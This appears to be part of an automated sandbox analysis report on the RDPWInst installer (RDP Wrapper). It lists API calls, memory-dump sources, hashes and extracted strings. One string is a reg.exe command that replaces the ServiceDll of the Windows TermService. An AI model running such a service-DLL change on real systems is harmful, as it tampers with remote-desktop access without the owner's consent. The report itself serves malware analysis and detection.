                                                                                                              • CloseHandle.KERNEL32(?,?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3CF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle$CreateErrorLastObjectProcessSingleWait
                                                                                                              • String ID: $sD$D$[-] CreateProcess error (code:
                                                                                                              • API String ID: 1377960556-1026335874

                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(00000000,?,?,00000000,00402C9A), ref: 004030BE
                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,00402C9A), ref: 004030D8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0

                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000000,0043C716,?,?,?,00447324,00000000,00000000,00000000,?,00443BC6,00000000,00443FB2), ref: 0043C600
                                                                                                              Strings
                                                                                                              • %SystemRoot%, xrefs: 0043C682
                                                                                                              • $sD, xrefs: 0043C60D
                                                                                                              • ServiceDll, xrefs: 0043C650
                                                                                                              • [-] OpenKey error (code , xrefs: 0043C612
                                                                                                              • \system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d ", xrefs: 0043C68F
                                                                                                              • " /f, xrefs: 0043C69A
                                                                                                              • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C5EF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast
                                                                                                              • String ID: " /f$$sD$%SystemRoot%$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters$\system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "
                                                                                                              • API String ID: 1452528299-2956723230
                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(00000000,?,00402C72), ref: 00402D5B
                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,00402C72), ref: 00402D71
                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,00402C72), ref: 00402D9F
                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,?,00402C72), ref: 00402DB5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              APIs
                                                                                                              • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                                                                              • lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                                                                              • GetUserDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409530
                                                                                                              • GetSystemDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 0040955C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DefaultLanguage$SystemUserlstrcpynlstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3749826553-0
                                                                                                              APIs
                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 004040D2
                                                                                                              • VirtualFree.KERNEL32(00449AC8,00000000,00008000,?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 0040412F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeVirtual
                                                                                                              • String ID: $zD$xPD
                                                                                                              • API String ID: 1263568516-535612291
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438BFB
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00438C6C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                                                                              • Instruction ID: 3681a8d3f24b20706dc106850b3bb9ce640454c4e8124a7cc358b0d46e7adf70
                                                                                                              • Opcode Fuzzy Hash: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                                                                              • Instruction Fuzzy Hash: 1F51A370B00344AFDB11EBA5C842B9EF7F9AB48304F11547EB444A3282CA7DAF069759
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                                              • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                                              • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                                                • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 3490077880-0
                                                                                                              • Opcode ID: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                                                                              • Instruction ID: 823ae625d887489e04d5fb836baef855571e76b59bd7737af2fa314308855dda
                                                                                                              • Opcode Fuzzy Hash: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                                                                              • Instruction Fuzzy Hash: 0D316F749002508BEF21BF69988975737A0AB05319F1640BFE806AB2D7C77C9CA4CB9D
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                                              • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                                              • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                                                • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 3490077880-0
                                                                                                              • Opcode ID: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                                                                              • Instruction ID: 46b61aa2349ed196f7bea0abd1f985a96ea7bcfce35a4251490327c9ac1ca2fd
                                                                                                              • Opcode Fuzzy Hash: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                                                                              • Instruction Fuzzy Hash: 1331A2749002908BDF21BF78888975737A0AB06319F1640BFE845AB2D7C37C9CA4CB9D
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                                                                              • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                                                                              • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                                                                                • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                                                                                • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                                                                                • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                                                                                • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 3490077880-0
                                                                                                              • Opcode ID: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                                                                              • Instruction ID: d971c45546d1ba4d910c131f5b4d15d6df32f901540fb653785064192c66a389
                                                                                                              • Opcode Fuzzy Hash: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                                                                              • Instruction Fuzzy Hash: 712191749002508BDF21BF79988975737A0AB06319F1640BFE806AB2C7C37C9CA4CB9D
                                                                                                              APIs
                                                                                                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00402F9F,?,00402C72), ref: 004029A6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID: $zD$$zD
                                                                                                              • API String ID: 4275171209-354537599
                                                                                                              • Opcode ID: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                                                                              • Instruction ID: 5217acd6ab2d11c2bd36ab0357f96252e91eb64f60a530f80fec48377855cdbd
                                                                                                              • Opcode Fuzzy Hash: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                                                                              • Instruction Fuzzy Hash: 8AF062F1B143004FDB45CF799D853157AD1A78A318F20807EE608EB7E8EBB484468B48
                                                                                                              APIs
                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004068D2
                                                                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 004069DF
                                                                                                              • SysFreeString.OLEAUT32(?), ref: 004069F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: String$Free$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 986138563-0
                                                                                                              • Opcode ID: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                                                                              • Instruction ID: fb71732fc0ca27c4a1f64b9cddcd98791c7700d24e5edf769cc3926ad45b99af
                                                                                                              • Opcode Fuzzy Hash: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                                                                              • Instruction Fuzzy Hash: D6E08CB91022017DEA002F228D14B3B3368AF82311B6980BFB401BA2D1D67C88419A3C
                                                                                                              APIs
                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 0043991B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID: ImagePath
                                                                                                              • API String ID: 3660427363-1008103227
                                                                                                              • Opcode ID: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                                                                              • Instruction ID: d4c3dc3867a5d7f93f9a48779984ca1be9368a485682844844f209d8ad6df9e6
                                                                                                              • Opcode Fuzzy Hash: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                                                                              • Instruction Fuzzy Hash: C0019E76604208AFDB00EFA9CC81EDFB7A8EB49314F00817AB954D7342DA749E048BA5
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID: $sD
                                                                                                              • API String ID: 71445658-3047594130
                                                                                                              • Opcode ID: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                                                                              • Instruction ID: 93af5e93b009f9dfb1ca8860ce5652d254f583336edc44d6a4486ea6cd266cab
                                                                                                              • Opcode Fuzzy Hash: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                                                                              • Instruction Fuzzy Hash: 19017571B04208AFD714EB65CC52A9EB3FCEB4C304F61457BF445E3281DA79EE149658
                                                                                                              APIs
                                                                                                              • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,ServiceDll,?,?), ref: 004398AE
                                                                                                              Strings
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Value
                                                                                                              • String ID: ServiceDll
                                                                                                              • API String ID: 3702945584-3252591312
                                                                                                              • Opcode ID: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                                                                              • Instruction ID: 396de0d2a0ab042baed8acc32e75219307ae4a3dd24f7b0442dd3090ee3af4a1
                                                                                                              • Opcode Fuzzy Hash: 02259710c559a2b72da5c974877bfc6bd73b47a0d5aa3515892af2eb9807f5fe
                                                                                                              • Instruction Fuzzy Hash: 74018671A042086FD750EBAEDC81A9FBBEC9F49324F00806AF958E7382D9799D049765
                                                                                                              APIs
                                                                                                                • Part of subcall function 004399A0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00439D81,?,00447324), ref: 00439D5F
                                                                                                              Strings
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpen
                                                                                                              • String ID: $sD
                                                                                                              • API String ID: 47109696-3047594130
                                                                                                              • Opcode ID: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                                                                              • Instruction ID: e2b80e318971c5615629c962b670a86c0d36aae3c059df6a015560dc8872c8c4
                                                                                                              • Opcode Fuzzy Hash: e90e8eeed010ee93333ce844b1745028c2c799c62f0c90b655c7822b69ebab96
                                                                                                              • Instruction Fuzzy Hash: F9013171E14304EFDB05CFA9C892A5DB7F8EB4D310F6140B6E810A7351D675EE10DA54
                                                                                                              APIs
                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,004392B4,?,?,ImagePath,00000000,004392B4), ref: 0043927D
                                                                                                              Strings
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID: ImagePath
                                                                                                              • API String ID: 3660427363-1008103227
                                                                                                              • Opcode ID: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                                                                              • Instruction ID: 752c998736a6c6af0e84b74aa330b189edc71255cbbe141243c37e1b481e64ab
                                                                                                              • Opcode Fuzzy Hash: adbd4c71f0fcc4d549a1fa8e18ed9452cd2da7834887e3629a62f86d07c84514
                                                                                                              • Instruction Fuzzy Hash: 90F01CA23042406FD744EA6E9C81F6B96DCDBCC714F14443EB288C7282D968CC098769
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A52
                                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00438AE9,?,?,00447324), ref: 00438A8C
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 436179556-0
                                                                                                              • Opcode ID: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                                                                              • Instruction ID: 0ee4ecbf886d923d9c7bbf31fd477b4cbe2ff9aaa7d825c43a2ca86d525438e5
                                                                                                              • Opcode Fuzzy Hash: 2d3289a1ee73edb82b509e2290eeebee96e579d361020ed9f990078e177ab248
                                                                                                              • Instruction Fuzzy Hash: E3315C70B04348AFDB11EBA98842B9EF7F9AB48304F50447EB544E7282DA78AF059759
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                                                                                • Part of subcall function 0040941C: lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                                                                                • Part of subcall function 0040941C: lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileLibraryLoadModuleNamelstrcpynlstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 2912033995-0
                                                                                                              • Opcode ID: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                                                                              • Instruction ID: f6262d892358e01f8eacd9344567111696420312dcbdab07fa653b046a231d07
                                                                                                              • Opcode Fuzzy Hash: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
